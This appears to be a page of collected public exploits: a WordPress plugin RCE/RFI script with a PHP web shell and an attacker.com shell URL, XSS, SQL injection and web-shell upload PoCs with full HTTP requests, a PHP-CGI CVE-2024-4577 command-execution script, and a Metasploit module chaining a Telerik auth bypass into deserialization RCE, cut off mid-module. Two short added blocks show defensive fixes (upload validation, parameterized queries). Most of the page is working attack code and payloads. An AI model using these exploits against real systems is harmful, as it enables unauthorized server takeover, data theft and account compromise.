<pre><code><br /># Exploit for Remote Code Execution (RCE) in RFC WordPress 6.0.8<br /># CODE BY E1.Coders "The King of Security"<br /> <br />import requests<br /> <br />target = "https://target.com"<br /> <br />def exploit_rfc_wordpress():<br />    # The plugin's settings handler stores the submitted value; the PHP payload is saved as the settings content<br />    url = f"{target}/wp-content/plugins/rfc-wordpress/rfc.php"<br />    payload = "<?php system($_GET['cmd']); ?>"<br /> <br />    try:<br />        response = requests.post(url, data={"rfc_action": "save_settings", "rfc_settings": payload})<br />        # An HTTP 200 only shows the request was accepted; confirm with the ?cmd= request below<br />        if response.status_code == 200:<br />            print("RCE exploit successful!")<br />            print(f"Visit {url}?cmd=whoami to execute commands")<br />        else:<br />            print("RCE exploit failed.")<br />    except requests.exceptions.RequestException as e:<br />        print(f"Error: {e}")<br /> <br /># Exploit for Remote File Inclusion (RFI) in RFC WordPress<br />def exploit_rfi_rfc_wordpress():<br />    url = f"{target}/wp-content/plugins/rfc-wordpress/rfc.php?rfc_action=save_settings"<br />    payload = "http://attacker.com/shell.php"<br /> <br />    try:<br />        response = requests.post(url, data={"rfc_settings": payload})<br />        if response.status_code == 200:<br />            print("RFI exploit successful!")<br />            print(f"Visit {target}/wp-content/plugins/rfc-wordpress/shell.php to execute commands")<br />        else:<br />            print("RFI exploit failed.")<br />    except requests.exceptions.RequestException as e:<br />        print(f"Error: {e}")<br /> <br />if __name__ == "__main__":<br />    exploit_rfc_wordpress()<br />    exploit_rfi_rfc_wordpress()<br /> <br /></code></pre>
<pre><code>Exploit Title: Premium Support Tickets For WHMCS Reflected XSS<br />Exploit Author: Sajibe Kanti<br />Vendor: ModulesGarden<br />Vendor Homepage:<br />https://www.modulesgarden.com/products/whmcs/premium-support-tickets<br />Product Name: Premium Support Tickets For WHMCS<br />Product Version: v1.2.10<br />Tested Version: WHMCS 8.10.1<br />Tested on: Windows 10<br />Vulnerability Discovery Date: 29/04/2024<br /><br />Description:<br />The Premium Support Tickets For WHMCS plugin by ModulesGarden is vulnerable<br />to reflected cross-site scripting (XSS). The "msg" parameter of the<br />submitticket.php error page (reached via "PremiumSupportTickets=error&msg=...")<br />is reflected into the response without output encoding, so an attacker can<br />inject JavaScript that executes in the context of the victim's browser.<br /><br /><br />Proof of Concept (POC):<br />1. Identify a website that uses the Premium Support Tickets For WHMCS<br />plugin by ModulesGarden.<br />2. Navigate to the ticket submission page (submitticket.php).<br />3. Select any department to open a new ticket.<br />4. If you lack support credit points, you are sent to an error page whose<br />URL carries "PremiumSupportTickets=error&msg=clientarea_message_cantcreateinthisdept".<br />5. Replace the value of the "msg" parameter with your payload.<br />6. For example, the following URL closes the attribute the value is<br />reflected into and injects an SVG element with an onload handler:<br /><br />https://example.com/submitticket.php?PremiumSupportTickets=error&msg=%22/%3E%3CsvG%20onLoad=alert(/xss/)%3E<br />7. Decoded, that payload is "/><svG onLoad=alert(/xss/)>; any other XSS<br />payload can be substituted, e.g. "<svg/onLoad=alert(/OPENBUGBOUNTY/)>".<br />8. Visit the modified URL in your browser.<br />9. Observe the alert popup, which confirms the injected script executed.<br /><br /><br />Impact:<br />Successful exploitation allows an attacker who can lure a user to a crafted<br />link to execute arbitrary JavaScript in that user's browser session on the<br />affected WHMCS instance. This could lead to various attacks, including but not<br />limited to:<br /><br />- Theft of sensitive information (session cookies, credentials, etc.)<br />- Phishing attacks targeting users of the affected WHMCS instance<br />- Defacement of the website or redirection to malicious content<br />- Browser-based attacks such as keylogging or screen capturing<br /><br />Note: This exploit is for educational purposes only. Unauthorized access to<br />or modification of systems is illegal and unethical. Always obtain proper<br />authorization before testing or exploiting vulnerabilities.<br /></code></pre>
<pre><code># Exploit Title: Life Insurance Management System - Stored Cross-Site Scripting (XSS)<br /># Exploit Author: Aslam Anwar Mahimkar<br /># Date: 18-05-2024<br /># Category: Web application<br /># Vendor Homepage: https://projectworlds.in/<br /># Software Link: https://projectworlds.in/life-insurance-management-system-in-php/<br /># Version: AEGON LIFE v1.0<br /># Tested on: Linux<br /># CVE: CVE-2024-36599<br /><br /># Description:<br />----------------<br /><br />A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php. The value is stored and later rendered unescaped on Client.php.<br /><br /><br /># Payload:<br />----------------<br /><br /><script>alert(document.domain)</script><br /><br /><br /># Attack Vectors:<br />-------------------------<br /><br />Submit the new-client form (addClient.php, handled by insertClient.php) with <script>alert(document.domain)</script> as the name. When any user then visits Client.php, the stored script executes.<br /><br /># Burp Suite Request:<br />----------------------------<br /><br />POST /lims/insertClient.php HTTP/1.1<br />Host: localhost<br />Content-Length: 30423<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQH<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/lims/addClient.php<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Cookie: 
PHPSESSID=v6g7shnk1mm5vq6i63lklck78n<br />Connection: close<br /><br />------WebKitFormBoundarymKfAe0x95923LzQH<br />Content-Disposition: form-data; name="client_id"<br /><br />1716051159<br /><br />------WebKitFormBoundarymKfAe0x95923LzQH<br />Content-Disposition: form-data; name="client_password"<br /><br />password<br /><br />------WebKitFormBoundarymKfAe0x95923LzQH<br />Content-Disposition: form-data; name="name"<br /><br /><script>alert(document.domain)</script><br /><br />------WebKitFormBoundarymKfAe0x95923LzQH<br />Content-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original"<br /><br />Content-Type: application/octet-stream<br /><br /><br />ÿØÿà<br /><br /></code></pre>
<pre><code># Exploit Title: Life Insurance Management System - Unauthenticated Remote Code Execution (RCE)<br /># Exploit Author: Aslam Anwar Mahimkar<br /># Date: 18-05-2024<br /># Category: Web application<br /># Vendor Homepage: https://projectworlds.in/<br /># Software Link: https://projectworlds.in/life-insurance-management-system-in-php/<br /># Version: AEGON LIFE v1.0<br /># Tested on: Linux<br /># CVE: CVE-2024-36598<br /><br /># Description:<br />----------------<br /><br />- An arbitrary file upload vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary code by uploading a crafted PHP file whose content starts with GIF image magic bytes.<br /><br />- In insertClient.php the fileToUpload field is validated only as an image by its content; the file extension is never checked, so a .php file that begins with "GIF89a" is accepted and written to /uploads/ under its original name. header.php also fails to enforce its login redirect, so the upload is reachable without authentication.<br /><br /><br /># Payload:<br />------------------<br /><br />payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"<br /><br /><br /># RCE via executing exploit:<br />---------------------------------------<br /><br /> # Step: run the exploit with python3 shell.py http://localhost/lims/<br /> # A successful run drops into an interactive RCE shell.<br /> <br />POC<br />-------------------<br /><br />import argparse<br />import random<br />import requests<br />import string<br />import sys<br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument('url', action='store', help='The URL of the target.')<br />args = parser.parse_args()<br /><br />url = args.url.rstrip('/')<br />random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))<br /><br /># "GIF89a" satisfies the image check in insertClient.php; the .php extension is never inspected<br />payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"<br /><br />file = {'fileToUpload': (random_file + '.php', payload, 'text/php')}<br />print('> Attempting to upload PHP web shell...')<br />r = requests.post(url + '/insertClient.php', files=file, data={'agent_id':''}, verify=False)<br />print('> Verifying shell upload...')<br />r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)<br /><br />if random_file in r.text:<br />    print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php')<br />    print('> Example command usage: ' + url + '/uploads/' + random_file + '.php?cmd=whoami')<br />    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))<br />    if launch_shell.lower() == 'y':<br />        while True:<br />            cmd = str(input('RCE $ '))<br />            if cmd == 'exit':<br />                sys.exit(0)<br />            r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':cmd}, verify=False)<br />            print(r.text)<br />else:<br />    if r.status_code == 200:<br />        print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')<br />    else:<br />        print('> Web shell failed to upload! The web server may not have write permissions.')<br /><br />---------------------------------------------------------------------------------------------------------------------------<br /><br />### Can also be performed manually.<br /><br /><br />Payload:<br />--------------<br /><br />GIF89a;<br /><?php<br />echo"<pre>";<br />passthru($_GET['cmd']);<br />echo"<pre>";<br />?><br /><br /># Attack Vectors:<br />-------------------------<br /><br />After uploading the malicious "image", request it directly to get the shell:<br /><br />http://localhost/lims/uploads/shell2.gif.php?cmd=id<br /><br /><br />Burp Suite Request<br />-----------------------------<br /><br />POST /lims/insertClient.php HTTP/1.1<br />Host: localhost<br />Content-Length: 2197<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5plGALZGPOOdBlF0<br />User-Agent: Mozilla/5.0 (Windows 
NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/lims/addClient.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="client_id"<br /><br />1716015032<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="client_password"<br /><br />Password<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="name"<br /><br />Test<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="fileToUpload"; filename="shell2.gif.php"<br />Content-Type: application/x-php<br /><br />GIF89a;<br /><?php<br />echo"<pre>";<br />passthru($_GET['cmd']);<br />echo"<pre>";<br />?><br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="sex"<br /><br />Male<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="birth_date"<br /><br />1/1/1988<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="maritial_status"<br /><br />M<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="nid"<br /><br />1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="phone"<br /><br />1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="address"<br /><br />1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="policy_id"<br /><br />1<br 
/><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="agent_id"<br /><br />Agent007<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="nominee_id"<br /><br />1716015032-275794639<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="nominee_name"<br /><br />Test1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="nominee_sex"<br /><br />1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="nominee_birth_date"<br /><br />1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="nominee_nid"<br /><br />1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="nominee_relationship"<br /><br />1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="priority"<br /><br />1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="nominee_phone"<br /><br />1<br />------WebKitFormBoundary5plGALZGPOOdBlF0<br /><br /><br /></code></pre>
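The advisory above turns on one detail: insertClient.php looks only at the leading bytes of the upload, so "GIF89a" followed by PHP passes as an image while the ".php" name is kept. The block below is an added illustration written for this page, not code from the Aegon Life application (which is PHP): it reconstructs that magic-byte-only check in Python next to a hardened validator, with constructed sample bodies. The file names, magic-byte table and allowlist are this example's own choices.

```python
import os
import secrets

# Constructed samples (not files from the advisory): a minimal GIF89a stand-in and
# the advisory's trick of a GIF header followed by PHP code.
BENIGN_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16 + b";"
SHELL_BODY = b"GIF89a;<?php passthru($_GET['cmd']); ?>"

# Leading bytes -> canonical extension (assumed table for this example)
IMAGE_MAGIC = {
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
}

ALLOWED_EXT = {".gif", ".jpg", ".jpeg", ".png"}


def vulnerable_accept(filename, data):
    """The check described for insertClient.php: the content must look like an
    image, but the client-chosen filename (and so its extension) is never inspected."""
    return any(data.startswith(magic) for magic in IMAGE_MAGIC)


def hardened_accept(filename, data):
    """Return the name to store the file under, or None to reject it."""
    # 1. Allowlist the final extension: "shell2.gif.php" ends in ".php" and is refused.
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return None
    if ext == ".jpeg":
        ext = ".jpg"
    # 2. Magic bytes must be present and must agree with the extension.
    magic_ext = next((e for m, e in IMAGE_MAGIC.items() if data.startswith(m)), None)
    if magic_ext != ext:
        return None
    # 3. Refuse image/PHP polyglots outright: a real image never needs a PHP open tag.
    if b"<?" in data:
        return None
    # 4. Store under a server-generated name, never the client's.
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    print("vulnerable accepts shell2.gif.php:", vulnerable_accept("shell2.gif.php", SHELL_BODY))
    print("hardened accepts shell2.gif.php:", hardened_accept("shell2.gif.php", SHELL_BODY))
    print("hardened stores photo.gif as:", hardened_accept("photo.gif", BENIGN_GIF))
```

Even with the hardened check, the upload directory should not be served with a PHP handler (or should live outside the web root), so that a file which slips through is returned as bytes rather than executed.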
<pre><code># Exploit Title: Life Insurance Management System - SQL Injection<br /># Exploit Author: Aslam Anwar Mahimkar<br /># Date: 18-05-2024<br /># Category: Web application<br /># Vendor Homepage: https://projectworlds.in/<br /># Software Link: https://projectworlds.in/life-insurance-management-system-in-php/<br /># Version: AEGON LIFE v1.0<br /># Tested on: Linux<br /># CVE: CVE-2024-36597<br /><br /># Description:<br />----------------<br /><br />Aegon Life v1.0 contains a SQL injection vulnerability via the client_id parameter of clientStatus.php. The parameter is placed into the query unsanitized, so a closing quote followed by OR 1=1 and a comment sequence rewrites the WHERE clause. Important user or system data may be leaked, and the information obtained can be used by malicious users to compromise the system further.<br /><br /># Payload:<br />------------------<br /><br />client_id=1511986023%27%20OR%201=1%20--%20a<br /><br /># Steps to reproduce<br />--------------------------<br /> - Log in with your credentials<br /> - Navigate to /client.php<br /> - Click on Client Status<br /> - You are taken to /clientStatus.php<br /> - Capture the request in Burp and inject the SQLi payload into the client_id field<br /><br /># Burp Request<br />-------------------<br /><br /><br />GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1<br />Host: localhost<br />sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n<br 
/>Connection: close<br /><br /></code></pre>
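To show what the client_id payload above actually does to the query, here is an added example written for this page (not code from the Aegon Life application, which is PHP): the lookup behind clientStatus.php reconstructed over an in-memory SQLite table, once with the value spliced into the SQL text and once with a bound parameter. The table, its column names and its rows are constructed for the example; the payload is the advisory's, URL-decoded.

```python
import sqlite3

PAYLOAD = "1511986023' OR 1=1 -- a"   # the advisory's client_id value, URL-decoded


def make_db():
    """Constructed sample data standing in for the application's client table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE client (client_id TEXT, name TEXT, status TEXT)")
    con.executemany("INSERT INTO client VALUES (?, ?, ?)", [
        ("1511986023", "alice", "active"),
        ("1716015032", "bob", "lapsed"),
        ("1716051159", "carol", "active"),
    ])
    return con


def vulnerable_lookup(con, client_id):
    # The value becomes part of the SQL text, the way the vulnerable page builds its query:
    # WHERE client_id = '1511986023' OR 1=1 -- a'   (the trailing quote is commented out)
    sql = "SELECT client_id, name, status FROM client WHERE client_id = '" + client_id + "'"
    return con.execute(sql).fetchall()


def hardened_lookup(con, client_id):
    # A bound parameter is always data: the quote and the comment never reach the SQL parser
    sql = "SELECT client_id, name, status FROM client WHERE client_id = ?"
    return con.execute(sql, (client_id,)).fetchall()


if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", vulnerable_lookup(con, PAYLOAD))   # every row comes back
    print("hardened:  ", hardened_lookup(con, PAYLOAD))     # no row has that literal id
```

The same contrast holds for MySQL, which the PHP application would normally use: with mysqli or PDO the fix is a prepared statement, not escaping the quote by hand.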
<pre><code># Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)<br /># Exploit Author: Yesith Alvarez<br /># Vendor Homepage: https://www.php.net/downloads.php<br /># Version: PHP 8.3.* < 8.3.8, 8.2.* < 8.2.20, 8.1.* < 8.1.29<br /># CVE : CVE-2024-4577<br /><br />from requests import Request, Session<br />import sys<br /><br /><br />def title():<br />    print('''<br /> <br /> _______ ________ ___ ___ ___ _ _ _ _ _____ ______ ______ <br /> / ____\ \ / / ____| |__ \ / _ \__ \| || | | || | | ____|____ |____ |<br /> | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__ / / / / <br /> | | \ \/ / | __|______/ /| | | |/ /|__ _|______|__ _|___ \ / / / / <br /> | |____ \ / | |____ / /_| |_| / /_ | | | | ___) | / / / / <br /> \_____| \/ |______| |____|\___/____| |_| |_| |____/ /_/ /_/ <br /> <br /> <br />Author: Yesith Alvarez<br />Github: https://github.com/yealvarez<br />Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/<br />Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py<br />    ''')<br /><br /><br />def exploit(url, command):<br />    # The first payload only confirms code execution; the second runs the supplied command.<br />    # A list (not a set) keeps that order deterministic.<br />    payloads = [<br />        '<?php echo "vulnerable"; ?>',<br />        '<?php echo shell_exec("' + command + '"); ?>'<br />    ]<br />    headers = {<br />        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',<br />        'Content-Type': 'application/x-www-form-urlencoded'}<br />    # %AD is the soft hyphen. On affected Windows locales the PHP CGI handler best-fit maps it to '-',<br />    # so the query string is parsed as "-d allow_url_include=1 -d auto_prepend_file=php://input" and the<br />    # POST body is prepended to the script as PHP code (CVE-2024-4577). Build the URL once, outside the loop.<br />    url = url.rstrip('/') + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"<br />    s = Session()<br />    for payload in payloads:<br />        req = Request('POST', url, data=payload, headers=headers)<br />        prepped = req.prepare()<br />        # Send the body without a Content-Type header; php://input still exposes the raw POST body<br />        del prepped.headers['Content-Type']<br />        resp = s.send(prepped,<br />                      verify=False,<br />                      timeout=15)<br />        print(resp.status_code)<br />        print(resp.text)<br /><br /><br />if __name__ == '__main__':<br />    title()<br />    if len(sys.argv) < 3:<br />        print('[+] USAGE: python3 %s https://<target_url> <command>\n' % (sys.argv[0]))<br />        print('[+] USAGE: python3 %s https://192.168.0.10 dir\n' % (sys.argv[0]))<br />        exit(0)<br />    else:<br />        exploit(sys.argv[1], sys.argv[2])<br /><br /><br /></code></pre>
<pre><code># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br /><br />require 'rex/zip'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br />  Rank = ExcellentRanking<br /><br />  prepend Msf::Exploit::Remote::AutoCheck<br />  include Msf::Exploit::Remote::CheckModule<br />  include Msf::Exploit::Remote::HttpClient<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'Telerik Report Server Auth Bypass and Deserialization RCE',<br />        'Description' => %q{<br />          This module chains an authentication bypass vulnerability (CVE-2024-4358) with a deserialization vulnerability<br />          (CVE-2024-1800) to obtain remote code execution against Telerik Report Server version 10.0.24.130 and prior.<br />          The authentication bypass flaw allows an unauthenticated user to create a new user with administrative privileges.<br />          The USERNAME datastore option can be used to authenticate with an existing account to prevent the creation of a<br />          new one. The deserialization flaw works by uploading a specially crafted report that when loaded will execute an<br />          OS command as NT AUTHORITY\SYSTEM. The module will automatically delete the created report but not the account<br />          because users are unable to delete themselves.<br />        },<br />        'Author' => [<br />          'SinSinology', # CVE-2024-4358 discovery, original PoC and vulnerability write-up<br />          'Soroush Dalili', # CVE-2024-1800 exploitation assistance<br />          'Unknown', # CVE-2024-1800 discovery<br />          'Spencer McIntyre' # MSF module<br />        ],<br />        'License' => MSF_LICENSE,<br />        'References' => [<br />          [ 'CVE', '2024-1800' ], # .NET deserialization vulnerability # patched in > 10.0.24.130<br />          [ 'CVE', '2024-4358' ], # Authentication bypass # patched in > 10.0.24.305<br />          [ 'URL', 'https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/' ]<br />        ],<br />        'Platform' => 'win',<br />        'Arch' => ARCH_CMD,<br />        'Targets' => [<br />          [ 'Automatic', {} ],<br />        ],<br />        'DefaultOptions' => {<br />          'SSL' => false,<br />          'RPORT' => 83<br />        },<br />        'DefaultTarget' => 0,<br />        'DisclosureDate' => '2024-06-04',<br />        'Notes' => {<br />          'Stability' => [ CRASH_SAFE, ],<br />          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],<br />          'Reliability' => [ REPEATABLE_SESSION, ],<br />          'RelatedModules' => [ check_module ]<br />        }<br />      )<br />    )<br /><br />    register_options([<br />      OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),<br />      OptString.new('USERNAME', [false, 'Username for the new account', '']),<br />      OptString.new('PASSWORD', [false, 'Password for the new account', ''])<br />    ])<br />    deregister_options('CheckModule')<br />  end<br /><br />  def check_module<br />    'auxiliary/scanner/http/telerik_report_server_auth_bypass'<br />  end<br /><br />  def check_options<br />    { 'ACTION' => 'CHECK' }<br />  end<br /><br />  def check<br />    check_code = super<br /><br />    if check_code == CheckCode::Appears<br />      # The auth bypass affects later versions than the RCE, so just filter those out<br />      version = check_code.details[:version]<br />      if version > Rex::Version.new('10.0.24.130')<br />        return CheckCode::Safe("Telerik Report Server #{version} is not affected by CVE-2024-1800.", details: check_code.details)<br />      end<br />    end<br /><br />    check_code<br />  end<br /><br />  def username<br />    @username ||= datastore['USERNAME'].blank? ? Faker::Internet.username : datastore['USERNAME']<br />  end<br /><br />  def password<br />    @password ||= (create_account? && datastore['PASSWORD'].blank?) ? Rex::Text.rand_text_alphanumeric(16) : datastore['PASSWORD']<br />  end<br /><br />  def create_account?<br />    # unless the user specifies a username, use CVE-2024-4358 to create an account for them.<br />    datastore['USERNAME'].blank?<br />  end<br /><br />  def create_account!<br />    # create a new account by exploiting CVE-2024-4358<br />    res = send_request_cgi(<br />      'method' => 'POST',<br />      'uri' => normalize_uri(target_uri.path, 'Startup/Register'),<br />      'vars_post' => {<br />        'Username' => username,<br />        'Password' => password,<br />        'ConfirmPassword' => password,<br />        'Email' => Faker::Internet.email(name: username),<br />        'FirstName' => Faker::Name.first_name,<br />        'LastName' => Faker::Name.last_name<br />      }<br />    )<br />    fail_with(Failure::Unreachable, 'No response received') if res.nil?<br />    fail_with(Failure::UnexpectedReply, 'Failed to create the new account') unless res.code == 302 && res.headers['location']&.end_with?('/Report/Index')<br />  end<br /><br />  def login<br />    res = send_request_cgi(<br />      'method' => 'POST',<br />      'uri' => normalize_uri(target_uri.path, 'Token'),<br />      'vars_post' => {<br />        'grant_type' => 'password',<br />        'username' => username,<br />        'password' => password<br />      }<br />    )<br /><br />    fail_with(Failure::Unreachable, 'No response received') if res.nil?<br />    fail_with(Failure::UnexpectedReply, 'Failed to login to the target (invalid response)') unless res.headers['content-type']&.start_with?('application/json')<br />    fail_with(Failure::NoAccess, 'Failed to login to the target (invalid credentials)') unless res.code == 200<br /><br />    access_token = res.get_json_document['access_token']<br />    fail_with(Failure::UnexpectedReply, 'Failed to login to the target (missing access token)') unless access_token.present?<br /><br />    print_good("Successfully authenticated as #{username}")<br />    report_creds(username, password)<br />    access_token<br />  end<br /><br />  def build_trdp<br />    zip = Rex::Zip::Archive.new<br />    zip.add_file(<br />      '[Content_Types].xml',<br />      Nokogiri::XML(<<-XML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).to_xml(indent: 0, save_with: 0)<br />        <Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><br />          <Default Extension="xml" ContentType="application/zip" /><br />        </Types><br />      XML<br />    )<br />    zip.add_file(<br />      'definition.xml',<br />      Nokogiri::XML(<<-XML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)<br />        <Report Width="6.5in" Name="oooo" xmlns="http://schemas.telerik.com/reporting/2021/1.0"><br />          <Items><br />            <ResourceDictionary<br />              xmlns="clr-namespace:System.Windows;Assembly:PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"<br />              xmlns:System="clr-namespace:System;assembly:mscorlib"<br />              xmlns:Diag="clr-namespace:System.Diagnostics;assembly:System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"<br />              xmlns:ODP="clr-namespace:System.Windows.Data;Assembly:PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"<br />            ><br />              <ODP:ObjectDataProvider MethodName="Start" ><br />                <ObjectInstance><br />                  <Diag:Process><br />                    <StartInfo><br />                      <Diag:ProcessStartInfo FileName="cmd" Arguments=#{"/c #{payload.encoded}".encode(xml: :attr)}></Diag:ProcessStartInfo><br />                    </StartInfo><br />                  </Diag:Process><br />                </ObjectInstance><br />              </ODP:ObjectDataProvider><br />            </ResourceDictionary><br />          </Items><br />        </Report><br />      XML<br />    )<br />    zip.pack<br />  end<br /><br />  def send_request_api(resource, method: nil, data: nil)<br />    if method.nil?<br />      method = data.nil? ? 'GET' : 'POST'<br />    end<br /><br />    res = send_request_cgi(<br />      'method' => method,<br />      'uri' => normalize_uri(target_uri.path, 'api', resource),<br />      'headers' => {<br />        'Authorization' => "Bearer #{@access_token}"<br />      },<br />      'ctype' => 'application/json',<br />      'data' => data.nil? ? nil : data.to_json<br />    )<br />    fail_with(Failure::Unreachable, 'No API response received') if res.nil?<br />    fail_with(Failure::UnexpectedReply, "The API responded with status #{res.code}") unless res.code == 200<br /><br />    return nil if res.body.blank?<br /><br />    fail_with(Failure::UnexpectedReply, 'API response content is not JSON data') unless res.headers['content-type']&.start_with?('application/json')<br /><br />    res.get_json_document<br />  end<br /><br />  def exploit<br />    if create_account?<br />      print_status('Creating a new administrator account using CVE-2024-4358')<br />      create_account!<br />      print_good("Created account: #{username}:#{password} (Note: This account will not be deleted by the module)")<br />    end<br /><br />    @access_token = login<br /><br />    categories = send_request_api('reportserver/categories')<br /><br />    report_name = rand_text_alphanumeric(10)<br />    category = categories.sample<br />    fail_with(Failure::Unknown, 'A random category could not be selected') unless category<br /><br />    print_status("Using category: #{category['Name']}")<br /><br />    send_request_api(<br />      'reportserver/report',<br />      data: {<br />        'reportName' => report_name,<br />        'categoryName' => category['Name'],<br />        'description' => nil,<br />        'reportContent' => Rex::Text.encode_base64(build_trdp),<br />        'extension' => '.trdp'<br />      }<br />    )<br />    vprint_status("Created report: #{report_name}")<br /><br />    res_json = send_request_api('reportserver/reports')<br />    @report = res_json.find { |report| report['Name'] == report_name && report['CategoryId'] == category['Id'] }<br /><br />    res_json = send_request_api(<br />      'reports/clients',<br />      data: {<br />        'timeStamp' => nil<br />      }<br />    )<br /><br />    client_id = res_json['clientId']<br />    fail_with(Failure::UnexpectedReply, 'Failed to 